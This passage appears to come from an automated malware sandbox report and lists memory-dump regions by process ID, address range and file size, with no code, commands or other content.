                                                                                                                                                                                                                                                                                                            • memory/1560-44-0x0000000004EA0000-0x00000000054C8000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              6.2MB

                                                                                                                                                                                                                                                                                                            • memory/1560-70-0x00000000063C0000-0x00000000063F2000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              200KB

                                                                                                                                                                                                                                                                                                            • memory/1560-92-0x0000000007430000-0x000000000744A000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              104KB

                                                                                                                                                                                                                                                                                                            • memory/1560-69-0x0000000005E80000-0x0000000005ECC000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              304KB

                                                                                                                                                                                                                                                                                                            • memory/1560-68-0x0000000005DD0000-0x0000000005DEE000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              120KB

                                                                                                                                                                                                                                                                                                            • memory/1560-67-0x0000000005900000-0x0000000005C54000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              3.3MB

                                                                                                                                                                                                                                                                                                            • memory/1560-57-0x0000000005790000-0x00000000057F6000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              408KB

                                                                                                                                                                                                                                                                                                            • memory/1560-56-0x0000000005720000-0x0000000005786000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              408KB

                                                                                                                                                                                                                                                                                                            • memory/1560-43-0x0000000004800000-0x0000000004836000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              216KB

                                                                                                                                                                                                                                                                                                            • memory/1560-55-0x0000000005650000-0x0000000005672000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              136KB

                                                                                                                                                                                                                                                                                                            • memory/1972-185-0x00000000027E0000-0x0000000002BE0000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              4.0MB

                                                                                                                                                                                                                                                                                                            • memory/1972-186-0x00007FFB92DB0000-0x00007FFB92FA5000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              2.0MB

                                                                                                                                                                                                                                                                                                            • memory/1972-188-0x0000000075880000-0x0000000075A95000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              2.1MB

                                                                                                                                                                                                                                                                                                            • memory/1972-182-0x0000000000A50000-0x0000000000A59000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              36KB

                                                                                                                                                                                                                                                                                                            • memory/2104-181-0x0000000075880000-0x0000000075A95000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              2.1MB

                                                                                                                                                                                                                                                                                                            • memory/2104-183-0x0000000000F60000-0x0000000000FCD000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              436KB

                                                                                                                                                                                                                                                                                                            • memory/2104-117-0x0000000000F60000-0x0000000000FCD000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              436KB

                                                                                                                                                                                                                                                                                                            • memory/2104-178-0x00000000036F0000-0x0000000003AF0000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              4.0MB

                                                                                                                                                                                                                                                                                                            • memory/2104-179-0x00007FFB92DB0000-0x00007FFB92FA5000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              2.0MB

                                                                                                                                                                                                                                                                                                            • memory/2104-177-0x00000000036F0000-0x0000000003AF0000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              4.0MB

                                                                                                                                                                                                                                                                                                            • memory/2112-2194-0x0000000005C20000-0x0000000005C6C000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              304KB

                                                                                                                                                                                                                                                                                                            • memory/2112-2195-0x0000000070680000-0x00000000706CC000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              304KB

                                                                                                                                                                                                                                                                                                            • memory/2112-2175-0x0000000005770000-0x0000000005AC4000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              3.3MB

                                                                                                                                                                                                                                                                                                            • memory/2112-2207-0x00000000070C0000-0x00000000070D1000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              68KB

                                                                                                                                                                                                                                                                                                            • memory/2112-2208-0x00000000070F0000-0x0000000007104000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              80KB

                                                                                                                                                                                                                                                                                                            • memory/2112-2205-0x0000000006E00000-0x0000000006EA3000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              652KB

                                                                                                                                                                                                                                                                                                            • memory/2152-1245-0x00000000009A0000-0x0000000000A0D000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              436KB

                                                                                                                                                                                                                                                                                                            • memory/2152-1295-0x00000000009A0000-0x0000000000A0D000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              436KB

                                                                                                                                                                                                                                                                                                            • memory/2184-1543-0x00000000706A0000-0x00000000706EC000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              304KB

                                                                                                                                                                                                                                                                                                            • memory/2184-1522-0x0000000005E50000-0x00000000061A4000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              3.3MB

                                                                                                                                                                                                                                                                                                            • memory/2992-1205-0x00000000070E0000-0x00000000070F1000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              68KB

                                                                                                                                                                                                                                                                                                            • memory/2992-1184-0x0000000005BE0000-0x0000000005C2C000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              304KB

                                                                                                                                                                                                                                                                                                            • memory/2992-1204-0x0000000006D80000-0x0000000006E23000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              652KB

                                                                                                                                                                                                                                                                                                            • memory/2992-1194-0x00000000706A0000-0x00000000706EC000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              304KB

                                                                                                                                                                                                                                                                                                            • memory/2992-1206-0x0000000007130000-0x0000000007144000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              80KB

                                                                                                                                                                                                                                                                                                            • memory/2992-1160-0x0000000005580000-0x00000000058D4000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              3.3MB

                                                                                                                                                                                                                                                                                                            • memory/3332-1950-0x00000000702E0000-0x000000007032C000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              304KB

                                                                                                                                                                                                                                                                                                            • memory/3332-1908-0x0000000005AA0000-0x0000000005DF4000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              3.3MB

                                                                                                                                                                                                                                                                                                            • memory/3332-1962-0x0000000007610000-0x0000000007624000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              80KB

                                                                                                                                                                                                                                                                                                            • memory/3332-1961-0x00000000075C0000-0x00000000075D1000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              68KB

                                                                                                                                                                                                                                                                                                            • memory/3332-1960-0x00000000072C0000-0x0000000007363000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              652KB

                                                                                                                                                                                                                                                                                                            • memory/3332-1948-0x0000000006650000-0x000000000669C000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              304KB

                                                                                                                                                                                                                                                                                                            • memory/4332-214-0x000001FEC76E0000-0x000001FEC76E8000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              32KB

                                                                                                                                                                                                                                                                                                            • memory/4372-2347-0x0000000000780000-0x00000000007ED000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              436KB

                                                                                                                                                                                                                                                                                                            • memory/4372-2317-0x0000000000780000-0x00000000007ED000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              436KB

                                                                                                                                                                                                                                                                                                            • memory/5164-2241-0x0000000000290000-0x00000000002FD000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              436KB

                                                                                                                                                                                                                                                                                                            • memory/5164-2278-0x0000000000290000-0x00000000002FD000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              436KB

                                                                                                                                                                                                                                                                                                            • memory/5532-1933-0x00000000003D0000-0x000000000043D000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              436KB

                                                                                                                                                                                                                                                                                                            • memory/5532-1626-0x00000000003D0000-0x000000000043D000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              436KB

                                                                                                                                                                                                                                                                                                            • memory/5676-2118-0x0000000007B10000-0x0000000007B24000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              80KB

                                                                                                                                                                                                                                                                                                            • memory/5676-2117-0x0000000007AC0000-0x0000000007AD1000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              68KB

                                                                                                                                                                                                                                                                                                            • memory/5676-2116-0x0000000007780000-0x0000000007823000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              652KB

                                                                                                                                                                                                                                                                                                            • memory/5676-2106-0x000000006FBC0000-0x000000006FC0C000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              304KB

                                                                                                                                                                                                                                                                                                            • memory/5676-2084-0x00000000065D0000-0x000000000661C000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              304KB

                                                                                                                                                                                                                                                                                                            • memory/5676-2068-0x00000000061B0000-0x0000000006504000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              3.3MB

                                                                                                                                                                                                                                                                                                            • memory/5760-2100-0x0000000000B70000-0x0000000000BDD000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              436KB

                                                                                                                                                                                                                                                                                                            • memory/5760-2028-0x0000000000B70000-0x0000000000BDD000-memory.dmp

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              436KB